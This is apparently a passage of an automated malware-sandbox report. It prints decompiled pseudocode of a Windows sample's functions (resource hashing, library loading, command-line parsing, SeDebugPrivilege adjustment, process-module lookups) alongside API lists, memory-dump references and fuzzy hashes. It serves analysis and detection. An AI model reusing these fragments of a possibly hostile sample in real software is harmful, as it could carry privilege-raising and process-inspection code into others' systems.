                                                                                                        • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                        0x0040a348
                                                                                                        0x0040a34e
                                                                                                        0x0040a352
                                                                                                        0x0040a35f
                                                                                                        0x0040a363
                                                                                                        0x0040a369
                                                                                                        0x0040a371
                                                                                                        0x0040a374
                                                                                                        0x0040a37c
                                                                                                        0x0040a380
                                                                                                        0x0040a383
                                                                                                        0x0040a386
                                                                                                        0x0040a388
                                                                                                        0x0040a388
                                                                                                        0x0040a38c
                                                                                                        0x0040a38f
                                                                                                        0x0040a39f
                                                                                                        0x0040a3a1
                                                                                                        0x0040a3a5
                                                                                                        0x0040a3a5
                                                                                                        0x0040a3a9
                                                                                                        0x0040a3aa
                                                                                                        0x0040a3b3
                                                                                                        0x0040a3b3
                                                                                                        0x0040a37c
                                                                                                        0x0040a371
                                                                                                        0x0040a3b8
                                                                                                        0x0040a3be

                                                                                                        APIs
                                                                                                        • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                        • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                        • String ID:
                                                                                                        • API String ID: 3473537107-0
                                                                                                        • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                        • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                        • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                        • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                        0x00404951
                                                                                                        0x00404952
                                                                                                        0x00404956
                                                                                                        0x004049a1
                                                                                                        0x00404958
                                                                                                        0x00404959
                                                                                                        0x0040495b
                                                                                                        0x0040495b
                                                                                                        0x0040495f
                                                                                                        0x00404961
                                                                                                        0x00404963
                                                                                                        0x0040496d
                                                                                                        0x00404975
                                                                                                        0x00404977
                                                                                                        0x0040497b
                                                                                                        0x00404985
                                                                                                        0x0040498a
                                                                                                        0x0040498e
                                                                                                        0x00404993
                                                                                                        0x0040499d
                                                                                                        0x0040499d

                                                                                                        APIs
                                                                                                        • malloc.MSVCRT ref: 0040496D
                                                                                                        • memcpy.MSVCRT ref: 00404985
                                                                                                        • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: freemallocmemcpy
                                                                                                        • String ID: W@
                                                                                                        • API String ID: 3056473165-1729568415
                                                                                                        • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                        • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                        • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                        • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                        0x0040543f
                                                                                                        0x00405456
                                                                                                        0x00405462
                                                                                                        0x00405467
                                                                                                        0x0040546d
                                                                                                        0x00405478
                                                                                                        0x00405489
                                                                                                        0x0040548d
                                                                                                        0x00000000
                                                                                                        0x00405492
                                                                                                        0x00405496

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00405456
                                                                                                          • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                          • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                          • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                          • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                        • wcscat.MSVCRT ref: 00405478
                                                                                                        • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3725422290-0
                                                                                                        • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                        • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                        • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                        • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004056B5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 136COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* __edi;
				void* __esi;
				signed short* _t68;
				signed short _t72;
				intOrPtr _t80;
				void* _t82;
				void* _t85;
				intOrPtr _t90;
				signed int _t101;
				intOrPtr _t102;
				void** _t104;
				signed short* _t106;
				signed int* _t107;
				signed int _t110;

				_t94 = __ecx;
				_t101 = 0;
				_v32 = 0x22;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 1;
				_v8 = 0;
				_v48 = 0;
				_v36 = 0;
				_v44 = 0;
				_v40 = 0x100;
				_v52 = 0;
				_t68 = E004054B9(_a4);
				_t106 = _a8;
				if( *_t106 == 0) {
					L31:
					_t107 = _a4;
					L32:
					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
					E004055D1(_t68,  &_v52);
					return _t102;
				}
				_v28 = _t106;
				do {
					_t72 =  *_v28 & 0x0000ffff;
					if(_t72 != 0x20 || _v8 != 0) {
						if(_t72 == 0x22 || _t72 == 0x27) {
							if(_v8 != 0) {
								if(_t72 != _v32) {
									goto L14;
								}
								_v8 = _v8 ^ 0x00000001;
								goto L25;
							}
							_v32 = _t72 & 0x0000ffff;
							_v8 = 1;
							goto L25;
						} else {
							L14:
							if(_t101 != 0) {
								L24:
								E0040559A( &_v52, _t101);
								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
								_t106 = _a8;
								_t101 = _t101 + 1;
								_v12 = _t101;
								L25:
								_v24 = 0;
								goto L26;
							}
							if(_t72 == 0x20) {
								goto L25;
							}
							_t104 = _a4 + 0x20;
							if(_v16 >= 0) {
								_t110 = _v16;
								_t82 = _t104[2];
								if(_t110 != 0xffffffff) {
									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
								} else {
									free( *_t104);
								}
								_t85 = _t110 + 1;
								if(_t104[3] < _t85) {
									_t104[3] = _t85;
								}
								_t94 = _v20;
								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
							}
							_t101 = _v12;
							goto L24;
						}
					} else {
						if(_v24 == 0) {
							E0040559A( &_v52, _t101);
							_t90 = _v36;
							 *((short*)(_t90 + _t101 * 2)) = 0;
							if(_t90 == 0) {
								_t90 = 0x40c4e8;
							}
							E004054DF(_a4, _t94, _t90); // executed
							_v16 = _v16 + 1;
							_v24 = 1;
							_v12 = 0;
							_t101 = 0;
						}
					}
					L26:
					_v20 = _v20 + 1;
					_t68 = _t106 + _v20 * 2;
					_v28 = _t68;
				} while ( *_t68 != 0);
				if(_t101 <= 0) {
					goto L31;
				}
				E0040559A( &_v52, _t101);
				_t80 = _v36;
				 *((short*)(_t80 + _t101 * 2)) = 0;
				if(_t80 == 0) {
					_t80 = 0x40c4e8;
				}
				_t107 = _a4;
				_t68 = E004054DF(_t107, _t94, _t80);
				goto L32;
			}





























                                                                                                        0x004056b5
                                                                                                        0x004056c3
                                                                                                        0x004056c5
                                                                                                        0x004056cc
                                                                                                        0x004056cf
                                                                                                        0x004056d2
                                                                                                        0x004056d5
                                                                                                        0x004056dc
                                                                                                        0x004056df
                                                                                                        0x004056e2
                                                                                                        0x004056e5
                                                                                                        0x004056e8
                                                                                                        0x004056ef
                                                                                                        0x004056f2
                                                                                                        0x004056f7
                                                                                                        0x004056fd
                                                                                                        0x00405832
                                                                                                        0x00405832
                                                                                                        0x00405835
                                                                                                        0x00405835
                                                                                                        0x00405838
                                                                                                        0x0040583e
                                                                                                        0x00405849
                                                                                                        0x00405849
                                                                                                        0x00405703
                                                                                                        0x00405706
                                                                                                        0x00405709
                                                                                                        0x00405710
                                                                                                        0x0040575b
                                                                                                        0x00405766
                                                                                                        0x0040577b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040577d
                                                                                                        0x00000000
                                                                                                        0x0040577d
                                                                                                        0x0040576b
                                                                                                        0x0040576e
                                                                                                        0x00000000
                                                                                                        0x00405783
                                                                                                        0x00405783
                                                                                                        0x00405785
                                                                                                        0x004057d1
                                                                                                        0x004057dc
                                                                                                        0x004057e4
                                                                                                        0x004057e8
                                                                                                        0x004057eb
                                                                                                        0x004057ec
                                                                                                        0x004057ef
                                                                                                        0x004057ef
                                                                                                        0x00000000
                                                                                                        0x004057ef
                                                                                                        0x0040578b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405790
                                                                                                        0x00405796
                                                                                                        0x00405798
                                                                                                        0x0040579e
                                                                                                        0x004057a1
                                                                                                        0x004057b4
                                                                                                        0x004057a3
                                                                                                        0x004057a5
                                                                                                        0x004057a5
                                                                                                        0x004057ba
                                                                                                        0x004057c1
                                                                                                        0x004057c3
                                                                                                        0x004057c3
                                                                                                        0x004057c8
                                                                                                        0x004057cb
                                                                                                        0x004057cb
                                                                                                        0x004057ce
                                                                                                        0x00000000
                                                                                                        0x004057ce
                                                                                                        0x00405717
                                                                                                        0x0040571a
                                                                                                        0x00405725
                                                                                                        0x0040572a
                                                                                                        0x0040572f
                                                                                                        0x00405733
                                                                                                        0x00405735
                                                                                                        0x00405735
                                                                                                        0x0040573e
                                                                                                        0x00405743
                                                                                                        0x00405746
                                                                                                        0x0040574d
                                                                                                        0x00405750
                                                                                                        0x00405750
                                                                                                        0x0040571a
                                                                                                        0x004057f2
                                                                                                        0x004057f2
                                                                                                        0x004057f8
                                                                                                        0x004057fe
                                                                                                        0x004057fe
                                                                                                        0x00405809
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405810
                                                                                                        0x00405815
                                                                                                        0x0040581a
                                                                                                        0x0040581e
                                                                                                        0x00405820
                                                                                                        0x00405820
                                                                                                        0x00405825
                                                                                                        0x0040582b
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                          • Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                          • Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                          • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                        • free.MSVCRT(?,00000000,?,00000000), ref: 004057A5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: free
                                                                                                        • String ID: "
                                                                                                        • API String ID: 1294909896-123907689
                                                                                                        • Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                        • Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
                                                                                                        • Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                        • Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004054B9, Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004054B9(intOrPtr* __esi) {

				free( *(__esi + 0x10));
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}



                                                                                                        0x004054bc
                                                                                                        0x004054c4
                                                                                                        0x004054cd
                                                                                                        0x004054cf
                                                                                                        0x004054d2
                                                                                                        0x004054d5
                                                                                                        0x004054d8
                                                                                                        0x004054db
                                                                                                        0x004054de

                                                                                                        APIs
                                                                                                        • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                        • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1294909896-0
                                                                                                        • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                        • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                                                        • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                        • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                        0x00408f4c
                                                                                                        0x00408f57
                                                                                                        0x00408f60
                                                                                                        0x00408f62
                                                                                                        0x00408f67
                                                                                                        0x00408f67
                                                                                                        0x00408f71

                                                                                                        APIs
                                                                                                          • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                          • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 187924719-0
                                                                                                        • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                        • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                        • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                        • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 37%
                                                                                                        			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                        0x004098fa
                                                                                                        0x004098fc
                                                                                                        0x00409901
                                                                                                        0x00409907
                                                                                                        0x00000000
                                                                                                        0x0040991c
                                                                                                        0x00409918
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                          • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                          • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                          • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                          • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                          • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$FileModuleName
                                                                                                        • String ID:
                                                                                                        • API String ID: 3859505661-0
                                                                                                        • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                        • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                        • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                        • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                        0x004095da
                                                                                                        0x004095da
                                                                                                        0x004095de
                                                                                                        0x004095e1
                                                                                                        0x004095e7
                                                                                                        0x004095e7
                                                                                                        0x004095ee
                                                                                                        0x004095fc

                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 3664257935-0
                                                                                                        • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                        • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                        • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                        • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                        0x0040a3d0
                                                                                                        0x0040a3d9

                                                                                                        APIs
                                                                                                        • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: EnumNamesResource
                                                                                                        • String ID:
                                                                                                        • API String ID: 3334572018-0
                                                                                                        • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                        • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                        • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                        • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004055D1, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004055D1(void* __eax, signed int* __esi) {
				void* _t7;
				signed int* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__esi[4] != 0) {
					free(__esi[4]); // executed
					__esi[4] = __esi[4] & 0x00000000;
				}
				_t9[2] = _t9[2] & 0x00000000;
				 *_t9 =  *_t9 & 0x00000000;
				return _t7;
			}





                                                                                                        0x004055d1
                                                                                                        0x004055d1
                                                                                                        0x004055d5
                                                                                                        0x004055da
                                                                                                        0x004055df
                                                                                                        0x004055e3
                                                                                                        0x004055e4
                                                                                                        0x004055e8
                                                                                                        0x004055eb

                                                                                                        APIs
                                                                                                        • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                        Memory Dump Source
